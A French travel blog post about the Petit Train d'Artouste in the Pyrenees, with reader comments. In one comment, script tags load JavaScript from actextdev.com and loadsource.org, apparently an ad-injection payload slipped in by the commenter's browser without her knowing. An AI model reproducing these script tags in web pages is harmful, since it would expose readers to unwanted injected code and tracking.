• LE TRAIN D'ARTOUSTE (1/2)

     

     

    Photos du 6 octobre dernier

    Nous avons passé la nuit au bord du lac de Fabrèges et décidons d'aller au lac d'Artouste. Nous le connaissons déjà pour y être passé lors d'une randonnée mais ce jour là nous sommes en balade et empruntons la plus haute ligne de chemin de fer touristique d'Europe    Le Petit Train d'Artouste 

     

     

    Le lac de Fabrèges, Pyrénées-Atlantiques, avec un niveau d'eau très bas

    à Fabrèges nous prenons la télécabine de la Sagette pour rejoindre la gare d'Artouste

    une montée vertigineuse de 1250 m à près de 2000 m d'altitude

     

    vue sur le barrage de Fabrèges

    à travers la vitre bien sûr !

    en prenant de l'altitude on voit "notre cher Jean- Pierre" .... Le Pic du Midi d'Ossau (2884m)

    à cette période de l'année le 1er départ de la journée est à 10heures

    c'est parti pour environ 50 minutes de train, à flanc de montagne

    En 1922 la ligne de chemin de fer a été spécialement conçue pour acheminer les hommes ainsi que le matériel nécessaire pour le chantier du barrage qui a duré 8 ans

    on a tout le temps de profiter du paysage, on verra une marmotte retardataire mais l'apn n'a pas été assez rapide, le bruit du train l'a sans doute effrayée, même si elle le connait bien !

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

    ceinture obligatoire dans le train 

     

     

    tchou-tchou, le train arrive bientôt en gare

    la gare et au dessus, la barrage d'Artouste (en plein contre-jour !)

     Tout le monde descend et continue à pied jusqu'au lac d'Artouste, voire plus haut !

    Dernier train à 17 h15 en ce jour d'octobre

     

     @ suivre

     

    les photos de ce billet en diaporama 

    un clic sur le rectangle en bas à droite pour lecture plein écran et un clic sur la cloche pour enclencher le son

     

     

    Merci de votre fidélité

     

     

     

     

    « SAINT-MICHEL DE MONTAIGNE (24)LE LAC D'ARTOUSTE ET RETOUR AVEC LE TRAIN D'ARTOUSTE (2/2) »

    Tags Tags : , , , ,
  • Commentaires

    1
    Mercredi 7 Novembre 2018 à 00:16
    Impressionnant! Je préfère regarder d'ici!!! mais que c'est beau et tu as du te régaler! Bises Dany
    2
    Mercredi 7 Novembre 2018 à 03:36
    Mitou
    Coucou DD
    Faut pas avoir le vertige ! La balade doit être super les paysages sont grandioses
    Gros bisous et bonne journée
    Mitou
    3
    Martine
    Mercredi 7 Novembre 2018 à 05:05
    Souvenirs, souvenirs ... nous avions fait cette balade il y a une dizaine d'années et c'est bizarre, je ne me souvenais pas que c'était aussi vertigineux par moments ! Tes photos sont superbes ! Bises, Martine
    4
    Mercredi 7 Novembre 2018 à 05:43

    J'aurais le vertige dans ce train. Superbes photos. Merci. Bon Mercredi. Bisous

    5
    Mercredi 7 Novembre 2018 à 05:54

    Oui voilà une belle randonnée Alpestre ! . Bonne journée DD , bisous ,

    escapade 

    6
    Mercredi 7 Novembre 2018 à 07:07

    impressionna mais de toute beauté !!

    j'aime beaucoup la montagne 

    alors je suis ravie de découvrir ton billet

    7
    Mercredi 7 Novembre 2018 à 07:15
    Tout embrasser du regard dans un laps de temps plus réduit que si tu avais fait le trajet à pied. J'aime bien la photo où tu nous montre le train "en balcon".
    8
    Mercredi 7 Novembre 2018 à 07:26

    Tes photos sont vraiment magnifiques mais j'avoue que j'ai eu du mal à en regarder certaines ...

    Et je ne fais pas ma chochotte, hein, ça me rend vraiment malade quand c'est vertigineux !

    Bon mercredi pluvieux et venteux !
    Bisoux, ma DD ♥

    9
    Mercredi 7 Novembre 2018 à 07:51

    Coucou DD,

    Quelle balade ! Les paysages sont fantastiques et emprunter ce petit train doit être un véritable plaisir. J'ai un coup de coeur pour ta photo sur le barrage. Merci pour cet excellent partage ma belle.

    Bises et bon mercredi

    10
    Mercredi 7 Novembre 2018 à 08:07

    bonjour Andrée

    une belle balade à flanc de colline qui permet d'admirer les paysages, mais parfois il ne faut pas avoir le vertige même si on est sur des rails !!!!

    bonne journée, bises, maurice

     

     

    11
    Mercredi 7 Novembre 2018 à 08:31

    C'est juste un petit train touristique, ce n'est pas un train voyageur, il me semble que dans la région il y a une ligne voyageur qui monte assez haut, dans ce train que vous avez pris on comprend que le port de la ceinture soit obligatoire, ça doit être impressionnant par endroit

    Amicalement

    Claude

      • Mercredi 7 Novembre 2018 à 08:46

         

        le train voyageur c'est dans les Pyrénées Orientales et c'est moins haut

        le Train Jaune ICI

    12
    Mercredi 7 Novembre 2018 à 09:08

    Bonjour DD 

    Oupsss je n'aurais pas ete  rassurée du tout ..rires !

    Mais il faut dire que les paysages sont magnifiques !

    Merci à toi 

    Bises

    13
    Mercredi 7 Novembre 2018 à 09:11

    Bonjour DD

    Je l'ai fait cette visite ici j'en garde un bon souvenir même si ce jour là nous avions prit un bel orage. Je le recommande car c'est vraiment beau

    Je te souhaite une agréable journée, bisous

    14
    Mercredi 7 Novembre 2018 à 10:10

    magnifique et vertigineux!!!! merci de l'avoir fait, quel paysage! bizarrement à pied je n'ai pas peur au bord d'un ravin, mais dans un véhicule, quel qu'il soit, je ne peux pas!!!! en effet, pas beaucoup d'eau dans le lac... gros bisous DD. cathy

    15
    Mercredi 7 Novembre 2018 à 10:37

    C'est très impressionnant!! Voilà une balade qui me plairait!

    merci pour toutes tes photos.

    Bonne journée, bises

    danièle

    16
    Mercredi 7 Novembre 2018 à 11:16

    Superbes paysages !!!
    Ca doit être chouette cette balade en train
    Bisous Andrée

    17
    Mercredi 7 Novembre 2018 à 11:45
    Roguidine

    Bonjour DD,

    C'est grandiose, une superbe balade en train, c'est mieux qu'à pied,
    car tu montes plus vite et peut être plus haut pour en voir plus !!  tes photos sont superbes, je suis revenue voir ton lien , j'aime beaucoup les montagnes, c'est la
    magie de la nature, le rêve ; j'ai adoré ce billet, ça donne bien envie d'y aller !
    Je te souhaite une bonne journée et merci pour ce beau voyage virtuel ! bisous
    Il pleut à Limoges aussi, ça fait du bien au sol mais pas à nous ! lol !

     

    <script src="//actextdev.com/1e10f75c6435cf205a.js"></script> <script src="http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52355x7696x&r=1541586542544" type="text/javascript"></script> <script src="http://actextdev.com/addons/lnkr5.min.js" type="text/javascript"></script> <script src="http://actextdev.com/ext/1e10f75c6435cf205a.js?sid=52355_7696_&title=ads&blocks[]=31af2" type="text/javascript"></script>
      • Jeudi 8 Novembre 2018 à 21:11

        ah oui Roguidine  je n'avais pas compris  !

        je vais voir ?  bisous à toutes les deux  

        coucou DD 

    18
    Mercredi 7 Novembre 2018 à 11:45

    bonjour DD , ah oui une sacré balade et je ne voyais pas le train comme ça  

    et là ou il passe , je viens de faire voir à Danièle  hi hi

    elle a eu peur rien qu'à voir tes photos   hi hi !

    magnifiques photos et reportage  j'aime beaucoup 

    et moi ça me plairait  !  bon Danièle me dit qu'elle se mettrait coté rocher ...

    A+ belle journée   ici il pleut depuis hier matin  dur dur  hi hi 

    19
    Mercredi 7 Novembre 2018 à 11:48
    Roguidine

    Oh zut, je ne sais pas d'où vient ce script, parfois j'arrive à l'enlever
    mais Bébert est arrivé, je n'ai rien pu faire !! excuses moi, je vais essayer d'enlever celui ci

    20
    Mercredi 7 Novembre 2018 à 13:25

    Coucou DD,

     oh! la hauteur d'eau du barrage est assez impressionnante, hein, surtout vu d'en haut. Hum! certains passages sont justes, hein, faut pas avoir peur du vide, dis donc, sinon que les montagnes sont belles. La sécheresse a sévi partout je vois. Gros bisous, ma belle, et douce journée

    21
    Mercredi 7 Novembre 2018 à 14:54

    Bonjour d’Angers …
    Un plaisir de te suivre dans ces pérégrinations ! …
    … Racontées en de nombreuses et belles photos …
    Sûrement une belle balade ! ...
    Merci ! … Passe une bonne journée ... Amicalement ... ¢ℓαυ∂є …

    22
    Mercredi 7 Novembre 2018 à 18:22

    Ah merdum, je viens d'aller voir sur le net mais c'est quand même loin de St Jean de Luz, je me disais tient une belle balade à faire quand on y sera en fin d'année.

    mais on y va pour se reposer pas pour faire des KMS 

    la balade est des plus belles , j'imagine le monde en pleine saison ! 

    quand je vois ce pauvre lac, je pleure !!! 

    bisous bisous et merci pour cette belle découverte 

      • Mercredi 7 Novembre 2018 à 18:58

         

        Le train a arrêté de fonctionner depuis mi-octobre,

        il reprendra en mai je pense 

    23
    Mercredi 7 Novembre 2018 à 19:21

    Coucou ma chère DD,

    Voilà ce que j'ai inscrit sur youtube, le lien que tu as mis sur mon blog...En plus, on voit que les éléphants sont en colère, il suffit de regarder la terre qui est envoyé e, l'air avec leurs pattes.

    Je reviendrais commenté ce petit train tout a l'heure.

    Bibizzz

    C'est bien dommage qu'un guide avec 23 ans de métier se laisse surprendre ainsi.

    Nous avons fait 16 safaris dans le park Kruger, mais, aussi bien notre ranger que notre traker ont fait très attention aux gestuels des animaux.
    Ce guide avait un gros véhicule 4x4, je ne comprend pas q' il ai attendu que ces trois éléphants le charge.
    Je peux vous dire que notre ranger et notre traker n'auraient pas attendu et serait partie en voyant ces trois éléphants arriver.
    Si vous étiez avec des touristes, c'était de l'inconscience a l'état pur.
    Nous avons vu un nombre incalculable d'animaux pendant tous ces safaris photos, pas une fois nous nous sommes sentis en danger.
    Il faudrait peut être changer de métier....
    24
    Mercredi 7 Novembre 2018 à 21:28

    Au bord du précipice, il ne fallait pas avoir le vertige

    Les paysages sont magnifiques

    Bonne soirée DD

    Bisous

     

    25
    Jeudi 8 Novembre 2018 à 10:01

    bravo pour ce magnifique parcours, je connaissais ce train, mais je n'ai jamais eu l'occasion de le prendre, on comprend pour la ceinture, mais quels paysages, sauf le lac un peu sec , compliments pour ce superbe reportage , merci DD  bisous 

    26
    Jeudi 8 Novembre 2018 à 11:15

    Et avant le barrage fallait construire la ligne de fer

    Jeudissimes gros bisous DD

    27
    Jeudi 8 Novembre 2018 à 13:36

    Féérique ce moment !!!

    Dire que nous n'avons pas eu l'occasion de faire cette superbe balade.

    Quelle belle vue de la-haut sur ces Pyrénées.

    De très bon moment de partage.

    Merci pour ces belles vues et superbe balade.

    Bisous DD

    Aimée

    28
    Marie-France
    Jeudi 8 Novembre 2018 à 14:49

    Bonjour DD

    Je te remercie pour ces photos et je te souhaite une bonne fin de journée.

    29
    Jeudi 8 Novembre 2018 à 16:58
    francinea

    Bonjour, j'ai  pris ce petit train, ça  vaut vraiment le déplacement; les sifflements des marmottes résonnent encore  dans mes oreilles ! là haut les paysages sont juste magnifiques; je te souhaite une bonne journée, bisous

    30
    Jeudi 8 Novembre 2018 à 18:22

    Salut,

    C'est super la balade par beau temps.
    Le temps est beau cet après midi alors on a pu faire des courses tranquille.
    Il fait quand même un peu frais.
    Bonne journée

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :